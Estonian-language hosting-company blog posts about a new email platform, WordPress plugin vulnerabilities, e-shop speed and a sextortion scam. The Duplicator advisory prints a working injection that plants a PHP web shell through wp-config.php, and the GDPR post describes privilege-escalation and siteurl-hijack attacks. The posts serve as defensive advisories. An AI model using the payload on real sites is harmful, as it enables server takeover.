Tööd alustas uus e-posti platvorm

Zone on tasa ja targu asunud klientide ette tooma ühe viimaste aastate suurema väljakutse vilja, milleks on kaasaegsem e-posti platvorm.

Uue platvormiga välja tuleku juures on meil üks olulisi eesmärke võimalikult vähe häirida oma klientide igapäevatööd, mistõttu saavad alguses vaikimisi selle kasutajateks meie uued kunded.

Neil, kes Zone infosüsteemi juba tarbivad, on peagi võimalik ise valida hetk, mil soovitakse oma postkastid uuele platvormile üle tõsta. Kuna paljude lõppkasutajatega klientide jaoks ei ole see triviaalne ülesanne, siis esialgu me kedagi tagant kiirustada ei kavatse.

Järgnevalt proovin kirjeldada meie uue e-posti platvormi võtmeomadusi, mis võiksid ahvataleda kõiki seda kasutama.

Uuel platvormil on kolmekordne töökindlus

Interneti olelusteenuste (veebimajutuse jms) kontekstis on e-post paljude teenusepakkujate ja kasutajate silmis teenimatult teisejärguline teenus, mille töökindlusele erilist tähelepanu ei pöörata ning millelt oodatakse ainult vaikselt taustal tiksumist. Pahatihti hoitakse kasutajate postkaste lausa veebiserveris, mis meie nägemuses on lubamatu.

Meil on alati e-posti teenindamise jaoks olnud eraldi füüsiline serveripark, milles igale infosüsteemi rollile on omad serverid (e-posti vastuvõtjad, välja saatjad, rämpspostifiltrid, antiviirused, proksid, postkastide säilitamine jne) ning enamus neist dubleeritud.

Nüüd astume sammukese veel edasi. Kasutaja postkasti säilitab tulevikus korraga mitte üks või kaks, vaid lausa kolm serverit, mis saavad talitluspidevuse säilitamise eesmärgil olema hajutatud mitme andmekeskuse vahel.

See tähendab, et isegi ühe või kahe serveri täieliku häivimise korral ei pea me kliendi teenuse taastamiseks veel kasutama varukoopiaid, vaid lihtsalt suunama päringud ümber kolmandale serverile.

Varukoopiatest ei pääse loomulikult üle ega ümber, neid jääme jätkuvalt tegema. Mitmeid teenuse üldise jätkusuutlikkusega seotud riske on võimalik maandada vaid varukoopiate abil.

Uus platvorm on vaikimisi turvalisem

Nende aastakümnete jooksul, mil oleme e-posti teenuse pakkumisega tegelenud, on ühiskonna ootused andmete privaatsusele muutunud palju nõudlikumaks ning e-posti puudutav seadusandlus samuti karmistunud.

Seetõttu on meie uues platvormis läbivalt kasutusel krüpteeritud ühendused TLS (Transport Layer Security) tehnoloogial, maandamaks salasõnade või kasutaja andmete lekkega seotud riske.

NB! Pane nüüd hästi tähele! See tähendab järgmist:

 • POP3 ja IMAP protokollid on ligipääsetavad ainult nende krüpteeritud vormides POP3S (TCP port 995) ja IMAPS (TCP port 993);
 • SMTP ühendus on samuti ligipääsetav ainult selle krüpteeritud vormis, kasutusel on SMTPS (TCP port 465) ja SMTP STARTTLS (TCP port 587).

Kuna sisuliselt käsitletakse pea igas postkastis isikuandmeid, siis on selline lähenemine nende kaitse kontekstis igati õigustatud. Nii aitame oma klientidel vältida mitmete elementaarsete riskide realiseerumist ja vähendada nendega seotud võimalikke kahjusid.

Rämpsposti ja pahavara eemaldamine on efektiivsem

Rämpspostifilter tegutseb nüüd efektiivsemalt, konkreetsemalt ja lausa 10x kiiremini.

Rämpspost pannakse edaspidi vaikimisi serveri pool hoitavasse eraldi kausta. Kui seni võisid rämpsuks klassifitseeritud kirjad märgistatuna jõuda ka kasutaja sisenevasse postkasti (inbox), siis uues platvormis hoitakse seda puhtamana.

Tähelepanu! Oluline on teada, et 30 päeva peale rämpskirja saabumist kustutakse see serveri poolt automaatselt ära.

Rämpsposti märgistamine kirja pealkirjas või sisus lõpeb aga ära. Erinevalt praegusest ei muudeta tulevikus enam rämpspostiks loetava kirja sisu ega pealkirja, need jäävad samaks. Kogu kirja rämpsuks klassifitseerimist puudutav täiendav info lisatakse kirja päistesse. Kiri pannakse rämpsposti kausta oma algse välimusega.

Rämpsposti tõkestamine muutub personaalsemaks.

Rämpsposti tuvastamise tundlikkuse seadistamisel võetakse senise domeenipõhise punktisüsteemi asemel kasutusele uus süsteem, mille “rangust” iseloomustab neli taset, mida saab määrata igale postkastile eraldi.

Need tasemed on:

 • deaktiveeritud
 • madal
 • keskmine
 • kõrge.

Vaikimisi seadistatakse rämpsposti tuvastustundlikkus keskmisel tasemel.

Arvestades globaalseid trende, ei ole pahavara tõkestamisega tegelevat antiviirust võimalik uues e-posti infosüsteemis ka enam välja lülitada.

Rakendustele või seadmetele spetsiifilised salasõnad pakuvad täiendavaid riskide maandamise võimalusi

Lisaks postkasti peasalasõnale on uues infosüsteemis võimalik luua täiendavaid salasõnu, mida saab kasutada erinevates rakendustes või seadmetes.

See võimaldab näiteks kasutada üht salasõna oma lauaarvutis, teist sülearvutis, kolmandat mobiilseadmes ja neljandat mõnes pilveteenuses. Salasõna lekkimisel on nii võimalik lihtsalt tuvastada kust see “jalutama läks”.

Samuti ei ole ühe salasõna kustutamisel või muutmisel kõik ligipääsud e-postile kadunud.

Täiendavaid salasõnu saab hetkel lisada veebipõhise e-posti vahendusel.

Kirju saab uues platvormis filtreerida ka serveri poolel

Lõpuks on saanud teoks paljude meie kasutajate poolt pikisilmi oodatud võimalus. Nüüd on võimalik lasta sisenevaid kirju filtreerida meie serveritel, mitte e-posti klienttarkvaral.

Kui kasutaja on seadistanud endale filtreid, siis serverid tähistavad, liigutavad, edastavad ja kustutavad kirjad vastavalt nendes kirjeldatud instruktsioonidele juba enne, kui need kliendi seadmesse jõuavad.

See tähendab, et enam pole vaja luua eraldi filtreid igas seadmes, kust neid loetakse. Samuti töötavad filtrid ühtmoodi sõltumata sellest, kuidas kasutaja oma kirjade poole pöördub – olgu selleks siis POP3, IMAP või veebipõhine e-posti klient.

Serveripoolseid filtreid saab täna seadistada veebipõhise e-posti kliendi seadetes.

(Kasutajaliides filtrite loomiseks pole tõesti hetkel just kõige mugavam, aga see paraneb peagi.)

E-posti seadistamine on kiirem ja dünaamilisem

Postkastide lisamine ja e-posti sätete muutmine muutub palju kiiremaks ja platvorm reageerib muudatustele dünaamilisemalt. Lisatud e-posti aadressid hakkavad edaspidi normaalolukorras tööle kohe peale haldusliideses nupu vajutamist ja muud e-posti sätete muudatused jõustuvad samuti hetkega.

Postkasti kustutamine samas ei toimu enam hetkega – kustutamisele järgneb nüüd 14 päevane karantiiniperiood, mille möödudes postkast hävitatakse. Selle perioodi jooksul on serveri haldajal võimalik otsustada postkasti taastada või see kohe hävitada.  See viimane tähendab kogu postkasti sisu kadumist –  kadunud andmeid pole enam võimalik taastada isegi varukoopiast, sest ka need hävitatakse.

Teenused saavad uued aadressid

Selleks, et mitte sundida olemasolevaid kasutajaid kohe oma seadistusi muutma, oleme otsustanud, et uue e-posti platvormi poole pöördumisel tuleb kasutada uusi teenuste aadresse.

Iga e-posti protokolli jaoks on see nüüd unikaalne:

 • SMTP teenuse leiab aadressilt smtp.zone.eu;
 • IMAP teenuse leiab aadressilt imap.zone.eu;
 • POP3 teenuse leiab aadressilt pop3.zone.eu.

Iseenesest lihtne, kuid nõuab kindlasti harjumist, sest praegused aadressid on kasutusel olnud juba väga pikka aega ja paljudel nö “käe sees”.

Senised aadressid jäävad seotuks praegu tarbitava platvormiga.

Selleks, et e-posti seadistamine oleks lihtsam, oleme klientprogrammide seadistamise juhistele lisanud võimaluse tuvastada konkreetsele domeenile kehtivad sätted.

Postkastile nime valimine läheb lihtsamaks

E-posti aadresside loomisel ettevõttes moodustatakse see reeglina kasutaja ees- ja perenimest, seejuures eksisteerib kaks koolkonda – ühed kirjutavad need kokku (jaantamm@domeen.tld) ja teised eraldavad punktiga (jaan.tamm@domeen.tld).

Toome need leerid omavahel kokku ja muudame punkti postkasti nimes valikuliseks. Uuel platvormil viivad ühte postkasti nii aadressidele jaantamm@domeen.tld, jaan.tamm@domeen.tld kui ka j.a.a.n.t.a.m.m@domeen.tld saadetud kirjad.

IMAP kataloogipuu on lihtsam ja ühildub paremini rakendustega

Senine, mõnedele IMAP protokolli kasutajatele veidi segadust tekitanud, INBOX prefix kaob uute postkastide nimeruumist ära. Kõik alam-postkastid tehakse tulevikus vaikimisi postkasti juurkataloogi. See lahendus ühildub paremini kaasagsete kolmandate osapoolte rakenduste ning pilveteenustega.

 

WP GDPR Compliance turvaprobleem

WordPress ja pluginad vajavad igapäevast ja soovitavalt automaatset uuendamist, sest nagu näitab järjekordne juhtum, suurendab uuenduse avaldamine probleemi ärakasutamist.

Sedapuhku on süüdlaseks WP GDPR Compliance plugin, mille koodis ei kontrollita kasutajaõiguseid ning nii saab kestahes WordPressi admin-ajax.php kaudu save_setting funktsiooni poole pöördudes muuta suvalisi seadeid (lisaks saab do_action() abil ligi WP muudele funktsionaalsustele).

Haavatavad on WP GDPR Compliance versioonid kuni 1.4.2 (kaasa arvatud), paigatud versioon on 1.4.3

Tüüpilised ründeviisid näivad hetkel olema sellised:

 • lubatakse kasutajate registreerimine users_can_register ja pannakse uue kasutaja rolliks (default_role) administrator … misjärel saab lisada meelepärase tagaukse muutes mõnda teema või pluginafaili – või enda tööriistakomplekti üles laadida
 • muudetakse ära site_url seaded (veebi baas-url), misjärel hakkab veeb laadima kõiki skripte ründaja poolt antud aadressilt… ning need skriptid suunavad kasutaja edasi kuhu-vaja (veebi aadress ja lehesisu udustatud):


Näites kasutatud veebilehe koodist on näha, kuidas skriptid ja CSS tulevad wtools[.]io pealt:

Varem on kasutusel olnud ka pastebin.com ja erealitatea[.]net

Kuidas puhastada?

Kui veebi home ja siteurl on muudetud, siis on esimeseks probleemiks haldusliidesele ligi pääsemine. Seega on vaja saada ligipääs, uuendada pluginad ja rookida välja kõik probleemne.

 • taasta phpMyAdmin’i kasutades andmebaasis siteurl ja home väärtused – selleks on sinu veebi URL (teataval puhul võivad need ka erinevad olla):

 • logi WP haldusliidesesse sisse ja uuenda WP GDPR Compliance plugin
 • kontrolli üle kasutajate registreerimine – Seaded > Üldine valikust: kasutajate registreerimine võiks mitte olla lubatud (kui see ei ole veebi jaoks oluline funktsionaalsus) ja roll võiks olla Lugeja ehk Subscriber:

 • kontrolli üle kasutajate nimekiri, eemalda tundmatud tegelased
 • ja seejärel kontrolli, ega külalised veel midagi maha ole poetanud – selleks on hea abivahend minu ctimer.php skript, mille kasutamise näite leiab blogipostitusest CSI küber – kas keegi on mu serveris faile muutnud?

Sellest probleemist kirjutavad ka:

pluginvulnerabilities.com – Unlike Wordfence and Other Security Providers We Warned About WP GDPR Compliance Before Websites Started to Get Hacked (08.11.2018)

Wordfence – Privilege Escalation Flaw In WP GDPR Compliance Plugin Exploited In The Wild (08.11.2018)

Sucuri – Erealitatea[.]net Hack Corrupts Websites with WP GDPR Compliance Plugin Vulnerability (09.11.2018) ja Hackers Change WordPress Siteurl to Pastebin (13.11.2018)

Kuidas e-smaspäevaks e-pood kiireks saada?

Kaks korda aastas toimuv e-smaspäeva poodlemis-kampaania on Zone jaoks erilise tähendusega: kuna me oleme aastaid olnud eelistatuim valik e-poe veebimajutuse valikul, jooksevad umbes pooled e-poed meie serverite peal.

Zone 74
Elkdata 16
Cloudflare, Inc. 6
Telia Eesti AS 5
Microsoft Corporation (Azure) 4
Hetzner Online GmbH 3
GleSYS Internet Services AB 3
Radicenter 3
OU cloud.ee 3
Wavecom 3
CITIC Telecom CPC Netherlands B.V. 3
kõik ülejäänud 29

Targa majutuse-valiku kõrval mängib olulist rolli ka veebi-poe kood: kasutusel olev Magento, WordPress vms rakendus võiks suuta lehekülje serveerida vähem kui sekundiga, selle kuvamiseks võiks olla vaja maksimaalselt 100-150 faili ning esilehe suurus peaks jääma alla 1-2 megabaidi.

Testisin 12. novembri kampaanias osalevaid poode ning panin tulemuste põhjal kokku lühikese video peamiste soovitustega:

Lisaks video ülevaatele leiad siitsamast blogist ühe varasema postituse, mis annab veel mitu head nippi, kuidas e-pood paremini tööle panna, kui klikid järgmist linki: https://blog.zone.ee/2018/05/13/seitse-nippi-kiire-e-poeni/

Kas sekspressimine e. sextortion kellegi peal töötab kah?

Oktoober on Euroopa küberturvalisuse kuu ja seetõttu on paslik hetk ette võtta selline populaarne küberkuritegevuse liik nagu sextortion.

See on väljapressimine, milles kasutatakse mõnest igati ontlikust veebist lekkinud e-postiaadressi ja parooli kombinatsiooni koos väitega, et sinu kontole on neid teades sisse murtud ning varsti saavad kõik teada, milliseid saite sa külastad ja mida sealt vaatad.

Sa ju ei kasuta mitmes veebisaidis sama parooli? Või vähemalt on täiesti kindel, et peamiste sotsmeedia-kontode ja eposti-teenuse paroolid on unikaalsed? Kui ei, siis vaheta need kohe ära, võimalusel lisa kahetasemeline tuvastus (2-factor authentication) … ja siis loe edasi, millisest riskist ennast just vabastasid.

Mina sain paar päeva tagasi sellise kirja, kus nii kirja adressaadina kui ka sisus on näha üks minu poolt mitteolulistes veebides kasutaja registreerimiseks kasutatav parool mille alguses “k” ja lõpus “2”*:

Ehk siis mulle kirjutab keegi rahvusvahelise häkkerirühmituse liige ning nagu ma juba aru peaks saama, on nad mu pets@tehnokratt.net kontole sisse häkkinud, teavad parooli ja saavad sealt ka kirju saata. Lisaks olla nende valduses minu sotsmeediakontod ning sõnumirakendused.

Aga see pole veel kõik – nad olevat ligi pääsenud ka minu arvutile ja selle veebikaamerale ning mind on tabatud n-ö in flagranti ja neil on olemas samaaegsed videosalvestused minust ja sellest, mida ma vaatasin.

Piinliku juhtumi võiks aga unustada, kui ma kannaks neile 700$ väärtuses Bitcoini etteantud aadressile.

Kas keegi selle triki õnge läheb?

Raske öelda. Mina olen kirja saanud 28. septembril kell 10:52:45 Zulu ehk Greenwichi aja järgi. Kui vaadata kirjas viidatud Bitcoini-rahakoti käivet, siis on see selline:

Tunnike pärast minule saabunud kirja on hakanud pihta laekumised, 0.1 BTC on tolle hetke kursiga umbes 700$ ehk sama mida minult küsiti. Erinevate summade küsimine sõltuvalt juhusest või tippdomeenist on selle skeemi puhul tavapärane, küllap väljapressijad jälgivad turu käitumist ja otsustavad, kas tõhusam on saada väiksemalt hulgalt ohvritelt 700$ või suuremalt 350$.

Ei saa loomulikult välistada, et raha tilgutamine on kampaania osa ning peabki jätma mulje, et häkkerigrupeeringul läheb hästi.

Kui sul on kogemust BTC-ülekannete analüüsiga, siis võin jagada aadressi ja kuulaks huviga – antud puhul leiab laekumisi nii mitmetuhande kasutuskorraga wallet’itest kui ka sellistest, kuhu on tulnud 2 BTC, millest on makstud 0.1 BTC “selle kontole” ja 1.9 kontole, millelt on omakorda makstud 0.1 ja 1.8 edasi…

Kuidas sekspressimine töötab?

Tõepoolest, kirja saatjaks oleks justnagu mina ise… aga see tuleb Korea IP-aadressilt mida tehnokratt.net SPF-kirje teps mitte lubatuks ei pea:

Koos kõigi muude probleemidega annab Zone spämmitõrje kirjale 27 punkti, tegemist on selge spämmiga mis saab külge märke või läheb spämmikausta. Paraku on kirja saatja-aadressi võltsimine äraütlemata lihtne – ja sama lihtne on huvilisel leida interneti tumedamalt poolelt lekkinud kasutaja-andmete baase, kus kirjas e-postiaadressid ja avatekstina talletatud paroolid.

Näiteks üks mõne-aasta-tagune juhtum, eeldatavasti on kõik selle veebi kasutajad saanud teavituse ning hoolsalt oma paroolid nii seal kui teistes kohtades ära muutnud:

Udustamine on siinkohal pigem uudishimu tekitaja – googeldades nähaolevaid paroole leiad hetkega nii selle kui mitmed muud Eestit puudutavad paroolitõmmised.

Ehk siis võetakse üks selline nimekiri ning saadetakse kõigile e-postidele nende parool koos ülaloleva kirjaga ja jäädakse raha ootama.

… ja küberturvakuu?

Nagu alguses mainitud, on oktoober Euroopas küberturvalisuse kuuks kuulutatud, sellega seotud Eestis toimuvad sündmused leiab ECSM veebist – ning Riigi Infosüsteemi Ameti eestvedadmisel toimub 15.10.2018 talgupäev.

Mina ei ole veel välja mõelnud, kuhu loengut pidama minna, aaaga… Kange kiusatus on võtta suur televiisor ja teha midagi huvitavat mõne ostukeskuse ava-alas. Nagu näiteks jagada tasuta wifit ja näidata ekraanil seda, kui pealtvaadatav see võrk tegelikult on.


* korduva parooli kasutamine “mitteolulistes veebides” ei pruugi siiski olla parim turvapraktika, sest on võimalik, et kusagil on mingi suva foorum, kuhu keegi saab minu e-postiga sisse logida ja spämmi postitada… Pigem võiks siis juba ka suva e-posti kasutada, nt mõnda mailinator.com pakutavat 😉

Vahel ei ole ka uuendamisest abi ehk Duplicator ja installer.php

Tuntud mantra kohaselt aitab veebirakendust turvalisena hoida sage uuendamine. Järgimist väärt soovitus, aga paraku leiab ka haavatavusi, mille puhul uuendamisest kohe üldse mitte kasu ei ole.

Duplicator – plugin, mis lubab WordPressi mugavalt kokku pakkida ja teises serveris uuesti paigaldada – on täpselt selline juhtum.

Kiire kokkuvõte: veendu, et sinu veebi juurkataloogi pole jäänud installer.php või installer-backup.php faili (näiteks tippides oma veebi-aadressi sappa: http://firmanimi.eu/installer.php). Kui on, siis korralda kohene kustutamine.
Ääremärkus: kõigil Zones majutatud lehtedel keelasime neile failidele ligipääsu, kustutamiseks on vaja eelnevalt failiõigused paika seada; juhis allpool.

Maasikaks tordi peal on sedapuhku see, et tegemist on 10+ MILJONIT korda paigaldatud pluginaga. Või õigupoolest: …see tort ainult (pahadest) maasikatest koosnebki:

 • tegemist on pluginaga, millel väidetavasti 10+ miljonit paigaldust;
 • esimesed ründed (sh Eestis) mõni nädal pärast paiga ja probleemikirjelduse avaldamist;
 • see ei ole neil esimene turvaprobleem;
 • paik kõrvaldab ühe ründeviisi, aga jätab alles teise võimaluse;
 • ükski paik ei kõrvalda Duplicatori kasutamise järel kustutamata jäänud installer.php ja installer-backup.php faile;
 • need failid võivad alles olla ka veebis, milles pluginat ennast enam ammu pole;
 • lisaks installerile võib veebis vedeleda ka andmebaas database.sql (saab kasutada nt admin-kasutaja parooli murdmiseks) ja kogu veebirakenduse arhiiv (mille nime installer.php reedab)
 • probleemi avastaja kirjeldab ründemeetodit täpsusega, mis võimaldab seda sisuliselt copy-paste meetodil kasutusele võtta (muuhulgas näeme rünnetes test.php faile);
 • tuntud veebiturvapakkuja blogipostitusest jääb mulje, et eelnevale vaatamata pole nad päris täpselt aru saanud, kuidas rünne töötab ja miks wp-config.php katki kipub minema.

Ehk siis… see maasikas on veidi “sedapsi”:

Mida Duplicator teeb?

Tegemist on WordPressi pluginaga, mis lubab olemasoleva veebi (nt veebiarendaja testserveris oleva) kokku pakkida, mille tulemuseks on üks suur arhiiv kõigi failide ja andmebaasi-sisuga ning installer.php skript.

Need saab lihtsa vaevaga uude serverisse üles laadida ning seejärel tippides veebiaadressi sappa installer.php ilma tehniliste teadmisteta seal ka lahti pakkida, vajadusel koos domeeninime muutmisega:

Paigaldamise järel jäävad aga serverisse alles nii installer, selle varukoopia kui ka arhiivist lahti pakitu:

Kuidas rünnatakse?

Kuna maha unustatud installer.php saab käivitada igaüks, siis võiks näiteks sisestada oma kontrolli all oleva andmebaasiserveri andmed ning paigalduse järel saaks seal admin-kasutaja parooli ära vahetada. Ja seejärel võib juba sobiliku tagaukse paigaldada, nt pluginana:

AGA! Duplicator kirjutab siia sisestatud andmed kenasti wp-config.php faili, misjärel on võimalik teha eriti labane koodisüst, pannes andmebaasi nimeks jupi koodi:

test');
file_put_contents("test.php", '<pre><?php if (isset($_GET["synacktiv_backdoor"])) { echo shell_exec($_GET["synacktiv_backdoor"]); } ?></pre>'); /*

Nüüd näeb wp-config.php välja selline:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'test'); 
file_put_contents("test.php", '<pre><?php if (isset($_GET["synacktiv_backdoor"])) { echo shell_exec($_GET["synacktiv_backdoor"]); } ?></pre>'); /*');

/** MySQL database username */
define('DB_USER', 'test');

/** MySQL database password */
define('DB_PASSWORD', 'test');

/** MySQL hostname */
define('DB_HOST', 'nowhere:12345');

… ja pöördudes korra otse wp-config.php poole (minu näidise puhul https://dupdup.local/wp-config.php), tekib samasse fail test.php, mis toimib lihtsa tagauksena (näide käsuga ls , mis kuvab veebi juurkataloogi sisu):

Loomulikult on selle käigus tehtud katki ka wp-config.php ja veebikülastajad näevad andmebaasi-ühenduse veateadet:

Kuidas ennast kaitsta?

Kui oled veebiarendajana (või -omanikuna) kunagi Duplicator’it kasutanud veebi kolimiseks, siis leia see aeg, et kõik varasemad projektid üle kontrollida ja eemalda veebi juurkataloogi jäänud installer.php, installer-backup.php, database.sql ja arhiivifail.

Kontrollimine on lihtne ja selleks pole isegi vaja FTP-ligipääsu: pannes falinime oma veebiaadressi sappa (nt: http://firmanimi.eu/installer.php), peaks kuvatama Error 404 ehk “lehte ei leitud” teadet. Kui avaneb ülal näha olev Duplicator’i dialoog, siis on väga pahasti.

Paha ei tee ka veidi põhjalikum veebiserveris ringivaatamine, sest sageli vedeleb seal kataloogides /vana või /new veebilehe erinevaid (paikamata ja kohati ka nõrga adminparooliga) versioone, näiteks test.php, mis kuvab serveri-infot jpm tarbetut kola, mis võib kellegi jaoks osutuda väärt turvaprobleemiks.

Zone kliendid on kaitstud

Zones majutatud veebidele lasid meie adminnid peale roboti, mis keelas kõigi Duplicator’i installer*.php failide lugemise (chmod 0x000), sest kliendi faile me ära kustutada ei tahaks. Kui probleemsed failid sinu veebis olemas, siis näed meil sellist veateadet:

… ja failide kustutamiseks pead FTP-programmis paremklõpsama failinimel ning andma kasutajale Read ja Write õigused: